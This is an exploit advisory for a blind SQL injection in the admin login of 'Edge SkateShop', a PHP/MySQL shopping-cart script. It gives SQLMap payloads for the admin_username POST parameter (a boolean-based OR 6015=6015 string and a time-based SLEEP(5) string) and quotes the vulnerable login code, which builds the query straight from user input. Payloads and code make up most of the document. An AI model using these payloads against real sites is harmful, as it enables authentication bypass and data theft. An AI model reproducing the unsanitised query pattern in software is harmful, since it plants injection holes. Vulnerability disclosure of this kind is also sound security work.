# Exploit Title: Edge SkateShop Blind Sql Injection # Date: 12/12/2016 # Exploit Author: Andrea Bocchetti # Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html # Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip # Version : n/a # Tested on: kali linux # Proof of Concept (Using SQLMap) : Parameter: admin_username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp Issue : if(isset($_POST['admin_login'])) { $admin_username=$_POST['admin_username']; $admin_password=$_POST['admin_password']; $check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'"; $run=mysqli_query($dbcon,$check_admin); if(mysqli_num_rows($run)) { echo "<script>alert('You're successfully login!')</script>"; echo "<script>window.open('Admin/index.php','_self')</script>"; $_SESSION['admin_username']=$admin_username; } else { echo "<script>alert('Username or password is incorrect!')</script>"; echo "<script>window.open('index.php','_self')</script>"; exit(); }